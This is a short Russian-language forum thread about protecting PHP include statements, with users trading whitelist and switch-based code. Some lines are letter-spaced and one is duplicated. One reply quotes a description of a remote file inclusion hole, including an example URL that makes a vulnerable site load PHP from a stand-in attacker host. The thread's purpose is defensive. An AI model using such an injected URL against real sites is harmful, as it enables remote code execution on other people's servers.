ЗАЩИТА ИНКЛУДА ЛУЧШЕ ПИСАТЬ ТАК
i f ( $mo d u l e = = \' f o r um \' ) i n c l u d e \' f o r um . p h p \' ; .
i f ( $mo d u l e = = \' f o r um \' ) i n c l u d e \' f o r um . p h p \' ; .
itech, что означает твой пост?
Че ты несешь, тебе задали вопрос, а ты начал писать как инклудить ////
abler98, есть сканеры которые по запросу открывают файл и папки и сканируют! Но лучше самому просмотреть убить хотябы с тела месяц но закрить!
а ещё лучше так:
<?php
switch($_GET[\'module\']){
case \'forum\':
include \'forum.php\';
break;
}
?>
abler98, а ищо лучше так! И дальше твой пост! Он уязвимый! Держы описания
Этот скрипт уязвим, так как к
содержимому переменной $mo d u l e просто прибавляется «.php» и по
полученному пути подключается файл. Взломщик может на своём сайте создать
файл, содержащий PHP-код ( h t t p : / / h a c k e r s i t e . c om/ i n c . p h p ), и зайдя на сайт по ссылке вроде h t t p : / /my s i t e . c om/ i n d e x . p h p ?mo d u l e = h t t p : / / h a c k e r s i t e . c om/ i n c выполнить любые PHP-команды.
Этот скрипт уязвим